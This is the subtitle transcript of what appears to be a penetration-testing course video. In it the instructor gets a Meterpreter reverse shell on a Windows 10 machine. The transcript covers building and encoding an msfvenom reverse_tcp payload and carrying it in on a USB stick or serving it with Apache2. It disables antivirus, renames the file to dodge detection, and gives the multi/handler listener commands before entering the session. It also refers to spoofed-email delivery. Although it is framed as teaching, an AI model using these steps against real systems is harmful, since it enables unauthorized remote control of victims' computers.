1
00:00:00,240 --> 00:00:02,360
Hello everybody and welcome back.

2
00:00:02,370 --> 00:00:06,470
And now let us finally exploit our Windows 10 machine.

3
00:00:06,540 --> 00:00:11,100
So, first of all, we created the payload with this command right here.

4
00:00:11,100 --> 00:00:18,030
We encoded it with this encoder right here on five iterations. We named it reverse1.exe

5
00:00:18,690 --> 00:00:20,450
The LHOST that we specified,

6
00:00:20,460 --> 00:00:24,570
let me just close this, is our IP address, and the LPORT is for 4444.

7
00:00:25,230 --> 00:00:31,510
So, what we want to do right now is we want to deliver this payload to our victim.

8
00:00:31,560 --> 00:00:38,320
Now for the first time, we will do that over a USB drive, which is the easiest and most simple.

9
00:00:38,360 --> 00:00:43,630
Now for this attack to work, you will need to have physical access to the victim's computer.

10
00:00:43,730 --> 00:00:49,520
Later on I will show you how you can do that over e-mail, and how you can spoof fake e-mails and send

11
00:00:49,790 --> 00:00:53,090
to anyone you want with the payload itself.

12
00:00:53,090 --> 00:00:57,150
So, first of all, what we want to do is plug in

13
00:00:57,150 --> 00:00:59,220
your USB drive into your PC.

14
00:00:59,240 --> 00:01:03,110
So just plug it in.

15
00:01:03,110 --> 00:01:04,340
Let me just....

16
00:01:04,340 --> 00:01:04,980
OK.

17
00:01:05,180 --> 00:01:07,370
So my USB drive is

18
00:01:07,370 --> 00:01:08,050
plugged in.

19
00:01:09,140 --> 00:01:12,650
But, you will notice that it will detect it in your main PC.

20
00:01:12,650 --> 00:01:18,770
Now in order for you to detect it on the Kali Linux machine, what you want to do is go onto the devices right

21
00:01:18,770 --> 00:01:22,800
here. So click on the devices, go to the USB,

22
00:01:22,940 --> 00:01:25,520
and here you want to find your USB drive.

23
00:01:25,520 --> 00:01:30,070
So for me this is the Kingston data travel 3.0.

24
00:01:30,590 --> 00:01:34,940
And if you click on it you will see, if you go once again right here, that now it is connected to your

25
00:01:34,940 --> 00:01:39,250
Kali Linux machine. So, in order for you to actually use it

26
00:01:39,280 --> 00:01:46,070
this should pop up, and you just click on open with files, and it will open your Kali Linux drive.

27
00:01:46,750 --> 00:01:47,270
Pardon me,

28
00:01:47,310 --> 00:01:53,420
your USB drive. And all you want to do from there is basically just copy your reverse1.exe

29
00:01:53,470 --> 00:01:59,800
or your payload, however you named it, to your USB drive. And simply just paste it into the USB.

30
00:01:59,830 --> 00:02:06,670
So my payload is in the root directory. So if I just type here in the root directory,

31
00:02:06,960 --> 00:02:12,830
let me just delete the other two. So reverse.exe we do not need, and shell.exe we do not need.

32
00:02:12,940 --> 00:02:17,400
So, we only want to copy the reverse1.exe which is our final payload.

33
00:02:17,800 --> 00:02:26,410
So let us do that by using the cp function in terminal, and then we specify these files which is reverse1.exe.

34
00:02:26,410 --> 00:02:28,480
And where we want it to go

35
00:02:28,480 --> 00:02:35,680
is media/root, and then just tab it to select your Kali Linux drive.

36
00:02:35,680 --> 00:02:41,290
Now if you do not want to copy it like this, you can basically just go to the applications or,

37
00:02:41,290 --> 00:02:47,560
pardon me, to the places. Then you want to go to the computer. Then basically just find your root directory.

38
00:02:47,950 --> 00:02:57,910
So let me just find it, root directory. Just click copy right here, and you can paste it right here. And

39
00:02:57,910 --> 00:03:04,550
that's how you can paste the file. Or you can use this command right here.

40
00:03:04,550 --> 00:03:09,550
So basically what you want to do after this, so media/root, just click here the tab button, and it

41
00:03:09,610 --> 00:03:13,840
automatically selects if you only have one USB drive plugged in, which you most likely do.

42
00:03:14,470 --> 00:03:19,270
So, we will not run this since I already copied it. What we want to do right now is just click here on

43
00:03:19,270 --> 00:03:25,510
this arrow in order to unmount the USB. After that, let me just close all of this. And what I want to

44
00:03:25,510 --> 00:03:30,060
do right now is unplug it from my Kali Linux machine.

45
00:03:30,070 --> 00:03:37,060
So just click right here, and right now it will be plugged in into my Windows 10 machine.

46
00:03:37,060 --> 00:03:43,620
So what I want to do is copy and paste this file on my desktop, or wherever you basically want. You need

47
00:03:43,620 --> 00:03:44,850
to provide administrator

48
00:03:44,860 --> 00:03:45,360
OK.

49
00:03:46,210 --> 00:03:51,050
So we copy the file...but let me see.

50
00:03:51,470 --> 00:03:54,620
Why doesn't it want to? OK.

51
00:03:54,630 --> 00:03:57,060
So, first thing.

52
00:03:57,710 --> 00:03:58,500
So this will happen.

53
00:03:58,500 --> 00:04:03,780
So, first thing that you want to do basically is, first of all let me just delete it since this will not

54
00:04:03,870 --> 00:04:05,030
work.

55
00:04:05,160 --> 00:04:11,130
The reason why is, first of all, you need to disable two things since this is a well known payload.

56
00:04:11,190 --> 00:04:13,860
You need to disable your antivirus if you have it.

57
00:04:13,860 --> 00:04:18,810
So for me that is the bitdefender. I will just click on it,

58
00:04:18,840 --> 00:04:26,130
so this my antivirus, you open your antivirus, and what you want to do is basically just close the protection

59
00:04:26,130 --> 00:04:26,640
for it.

60
00:04:27,150 --> 00:04:33,850
So right now I will be able to transfer my virus in order for it to not get deleted, since my device

61
00:04:33,850 --> 00:04:35,010
is at risk.

62
00:04:35,010 --> 00:04:42,210
Now you will do the same with your antivirus, and you also need to do the same

63
00:04:42,210 --> 00:04:44,010
with the Windows defender.

64
00:04:44,130 --> 00:04:48,590
Now I already had that turned off, so let me just repeat the process.

65
00:04:48,600 --> 00:04:49,770
I will do it real fast.

66
00:04:49,770 --> 00:04:55,830
So, cp reverse1.exe into media/root and then Kali drive.

67
00:04:55,830 --> 00:05:03,540
So now I want to change my directory. Ss we can see, item was deleted since it detected it as a Trojan,

68
00:05:03,540 --> 00:05:06,870
as we can see right here.

69
00:05:06,960 --> 00:05:10,440
That's why I couldn't run the file or copy it to the desktop.

70
00:05:10,440 --> 00:05:16,910
But right now if I go to my Kali Linux drive and I use the,

71
00:05:16,990 --> 00:05:22,900
let me just rename the file to shell.exe so it isn't named reverse1.exe.

72
00:05:23,310 --> 00:05:25,800
And we need to do the same thing

73
00:05:26,160 --> 00:05:28,680
as the previous time, so un-mount the USB drive.

74
00:05:28,680 --> 00:05:31,120
So just uncheck it right here.

75
00:05:31,320 --> 00:05:33,720
Now let's now try to copy the file once again.

76
00:05:34,350 --> 00:05:38,270
So now as you can see it works, so the file is right here.

77
00:05:38,500 --> 00:05:43,260
We do not need this USB drive anymore, or we will just leave it. It doesn't really matter.

78
00:05:43,420 --> 00:05:50,090
And the next thing you want to do before you actually run this file is actually start up your listener.

79
00:05:50,320 --> 00:05:50,870
Now,

80
00:05:51,530 --> 00:05:54,820
let me change my directory to root and run msfconsole.

81
00:05:55,070 --> 00:05:56,050
So,

82
00:05:56,090 --> 00:06:01,740
as I said, you want to use your LHOST IP address and your LPORT that you specified in the payload itself.

83
00:06:01,760 --> 00:06:07,390
Now one more thing to note is that you do not need to deliver the

84
00:06:07,430 --> 00:06:09,250
payload within the USB drive,

85
00:06:09,320 --> 00:06:11,870
you can also download it over Apache2.

86
00:06:12,290 --> 00:06:17,510
But I found this simple. You can just start Apache2, then copy the payload into the /var/

87
00:06:17,510 --> 00:06:23,840
www/html folder, and just open up from Windows 10 machine your IP address in the Google search

88
00:06:23,840 --> 00:06:26,070
bar, and just click on the file to download it.

89
00:06:26,090 --> 00:06:30,820
That is another way to do it. But, we will do it over the USB drive now since we already did it.

90
00:06:30,830 --> 00:06:41,120
Now once you open the msfconsole, what you want to do is use/exploit/multi/handler, and what you want

91
00:06:41,120 --> 00:06:47,830
to do is set the payload that you used in the process of making the payload with msfvenom.

92
00:06:47,870 --> 00:06:54,260
Now we used Windows x64 meterpreter reverse TCP, so we want to set that payload as well. So set payload

93
00:06:54,830 --> 00:07:00,380
windows/x64/meterpreter/reverse_tcp

94
00:07:01,340 --> 00:07:05,560
So the next thing, we want to show options and set our LHOST.

95
00:07:05,560 --> 00:07:11,860
Now our LHOST is .1.4 I believe. It has to be the same as in the payload specification.

96
00:07:11,880 --> 00:07:16,230
So, set LHOST 192.168.1.4.

97
00:07:17,050 --> 00:07:23,250
And right now, show options once again in order to double check it all, we have set the windows/x64/

98
00:07:23,290 --> 00:07:28,850
meterpreter/reverse_tcp as payload, our LPORT is the same as in the specification of our payload,

99
00:07:28,880 --> 00:07:31,400
and our LHOST is our IP address.

100
00:07:31,460 --> 00:07:34,280
The only thing you want to do right now is type exploit.

101
00:07:34,360 --> 00:07:39,410
Now in order to run the exploit as a background process you can just type your exploit

102
00:07:39,410 --> 00:07:46,080
-j -z, and this is the process of listening in the background. So you will still be able to execute commands.

103
00:07:46,110 --> 00:07:50,350
So show options and all of that instead of just waiting for the connection.

104
00:07:50,420 --> 00:07:56,330
Now in order to close that process you can just type here jobs and it will say that

105
00:07:56,360 --> 00:08:02,060
the jobs currently running are the exploit multihandler, and listening on this IP address right

106
00:08:02,060 --> 00:08:03,600
here, and on this port.

107
00:08:04,100 --> 00:08:08,990
So, the only thing we need to do right now is actually open this file.

108
00:08:08,990 --> 00:08:15,770
Now, if you deliver this file over a USB drive, you can just double click it and it will open. But if you

109
00:08:15,770 --> 00:08:24,500
download the file from the Internet, or from Apache2, or via email, or via anything else,

110
00:08:24,890 --> 00:08:28,730
it will ask for permission to run it. It will ask

111
00:08:28,730 --> 00:08:32,690
are you sure you want to run this file since it is a .exe file.

112
00:08:32,690 --> 00:08:37,520
It is an executable and it will do this for every executable you download over the internet.

113
00:08:37,550 --> 00:08:41,050
It will ask do you want to run it since it is an executable file.

114
00:08:41,180 --> 00:08:45,830
But since we delivered it over a USB, we can just double click it and it will run

115
00:08:45,860 --> 00:08:49,790
for us. It will not ask anything else, and it will just open.

116
00:08:49,940 --> 00:08:55,340
But if I go right here to my Kali Linux machine, you will see that we got meterpreter session 1

117
00:08:55,400 --> 00:09:02,780
open on our local listening address to the Windows 10 machine, which is .1.3 on

118
00:09:02,780 --> 00:09:03,450
this port.

119
00:09:03,470 --> 00:09:09,140
So if I just click here enter, in order for you to enter this session, since we are doing this for the

120
00:09:09,140 --> 00:09:14,610
first time, what you want to type in your Metasploit is basically just sessions, and then it will

121
00:09:14,610 --> 00:09:17,820
list you all of the sessions that you currently have. Now

122
00:09:17,990 --> 00:09:22,550
at the moment we only have the session with our Windows 10 machine, since that is the only machine that we

123
00:09:22,550 --> 00:09:23,710
attacked at the moment.

124
00:09:23,840 --> 00:09:26,300
In order for you to enter that session what you want to do,

125
00:09:26,480 --> 00:09:29,610
let me just clear this so you can see it better,

126
00:09:29,680 --> 00:09:31,750
you can see this I.D. number 1.

127
00:09:32,270 --> 00:09:36,770
So once you type sessions it will printout all of the sessions and you can see that the session I.D.

128
00:09:36,860 --> 00:09:44,870
is number 1. In order for you to enter it just type here session -i and then 1. Oops...

129
00:09:44,890 --> 00:09:47,020
I think its sessions -i and then 1.

130
00:09:47,170 --> 00:09:48,950
Okay, so we will just add s.

131
00:09:48,970 --> 00:09:57,700
So sessions -i and then 1, and we can see we successfully got our meterpreter shell open. Now

132
00:09:57,910 --> 00:10:05,170
this is the first time, so what we want to do right now is basically just run the help command.

133
00:10:05,200 --> 00:10:11,020
Since we do not know what we can run, and the help command will printout all of our available options

134
00:10:11,020 --> 00:10:14,030
for the Metasploit framework Meterpreter shell.

135
00:10:14,080 --> 00:10:19,000
So in order, for example, to check who we are we can just type here

136
00:10:20,000 --> 00:10:25,140
getuid, and it will say that this is the user that we are currently.

137
00:10:25,220 --> 00:10:31,940
So, we will notice that we are not the administrator which we will fix in post-exploitation

138
00:10:32,600 --> 00:10:38,870
videos, where I will show you what else you can run, and how you can elevate privileges, how you can get

139
00:10:38,870 --> 00:10:43,590
passwords, how you can upload /download files, and what else you can do.

140
00:10:43,730 --> 00:10:45,730
But for now on this will be good.

141
00:10:45,740 --> 00:10:52,730
So, for example, if I type ifconifg, you will see that my IP address is 192.168.1.8 and

142
00:10:52,730 --> 00:10:55,850
it is also 192.168.1.3

143
00:10:55,970 --> 00:10:58,670
Now you might be asking, how do I have two IP addresses?

144
00:10:58,670 --> 00:11:06,290
Well, that is because I have a wireless network interface and a cable interface on my Windows

145
00:11:06,430 --> 00:11:07,360
10 machine.

146
00:11:07,400 --> 00:11:12,320
So I basically have two interfaces running and connected to the Internet at the moment. One of them,

147
00:11:12,350 --> 00:11:18,980
as you can see, is the wireless network adapter which is at .1.8, and the other one is simply

148
00:11:19,010 --> 00:11:22,050
over cable which is .1.3

149
00:11:22,070 --> 00:11:31,150
So, this is the one. And you can also, for example, check some other commands...

150
00:11:32,770 --> 00:11:33,720
let me just type help

151
00:11:34,120 --> 00:11:35,770
so we can see what else we can run.

152
00:11:35,770 --> 00:11:38,580
I believe you can check the arp tables as well.

153
00:11:38,590 --> 00:11:43,750
So you just type here arp, yeah. There are a bunch of the other commands, and a bunch of the other modules,

154
00:11:43,750 --> 00:11:46,650
that will also start running in the next video.

155
00:11:47,290 --> 00:11:53,260
But for now we just wanted to get the session opened, and I will continue showing you what you can do in

156
00:11:53,260 --> 00:11:54,340
the next video.

157
00:11:54,340 --> 00:11:56,400
So I hope I see you there and take care.

158
00:11:56,470 --> 00:11:56,970
Bye!